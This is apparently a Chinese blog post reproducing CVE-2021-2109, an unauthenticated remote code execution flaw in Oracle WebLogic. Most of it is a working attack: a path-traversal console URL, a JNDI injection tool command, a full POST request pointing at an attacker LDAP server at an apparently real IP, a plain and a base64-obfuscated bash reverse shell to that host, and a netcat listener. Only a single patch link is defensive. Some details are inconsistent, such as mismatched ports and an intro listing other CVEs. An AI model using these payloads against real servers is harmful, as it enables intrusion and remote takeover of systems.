Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109

发表评论
643 views

A+

摘要

未经身份验证的攻击者可通过此次的漏洞实现远程代码执行

0x01 简介

2021年1月20日，绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU（Critical Patch Update），共修复了329个不同程度的漏洞，其中包括7个影响WebLogic的严重漏洞（CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756），未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8，利用复杂度低。建议用户尽快采取措施，对上述漏洞进行防护。

0x02 漏洞编号

CVE-2021-2109

1	CVE-2021-2109

0x03 影响版本

WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0

WebLogic Server 10.3.6.0.0

WebLogic Server 12.1.3.0.0

WebLogic Server 12.2.1.3.0

WebLogic Server 12.2.1.4.0

WebLogic Server 14.1.1.0.0

0x04 漏洞复现

未授权访问地址：

http://ip:7001/console/css/%252e%252e%252f/consolejndi.portal

1	http://ip:7001/console/css/%252e%252e%252f/consolejndi.portal

java  -jar  JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar   -A  vps   -C  "touch /tmp/shelli"

1	java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A vps -C "touch /tmp/shelli"

poc

/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/cqubba;AdminServer%22)

1	/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/cqubba;AdminServer%22)

POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://81.70.146;55:1389/cqubba;AdminServer%22) HTTP/1.1
Host: ip:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://81.70.146;55:1389/cqubba;AdminServer%22) HTTP/1.1

Host: ip:7001

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

命令执行成功

反弹shell

bash

/bin/bash -i >&  /dev/tcp/vps/55555 0>&1

1	/bin/bash -i >& /dev/tcp/vps/55555 0>&1

base64编码：http://www.jackson-t.ca/runtime-exec-payloads.html

bash -c {echo,L2Jpbi9iYXNoIC1pID4mICAvZGV2L3RjcC84MS43MC4xNDYuNTUvNTU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}

1	bash -c {echo,L2Jpbi9iYXNoIC1pID4mICAvZGV2L3RjcC84MS43MC4xNDYuNTUvNTU1NTUgMD4mMQ==}\|{base64,-d}\|{bash,-i}

开启监听

nc  -lnvp   9999

1	nc -lnvp 9999

poc

/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/3pgd15;AdminServer%22)

1	/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/3pgd15;AdminServer%22)

0x05 工具附件

https://github.com/welk1n/JNDI-Injection-Exploit

1	https://github.com/welk1n/JNDI-Injection-Exploit

0x06 修复建议

更新最新补丁，参考Oracle官网发布的补丁：https://www.oracle.com/security-alerts/cpujan2021.html

我的微信
这是我的微信扫一扫

我的微信公众号
我的微信公众号扫一扫

2023年三月
一	二	三	四	五	六	日
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31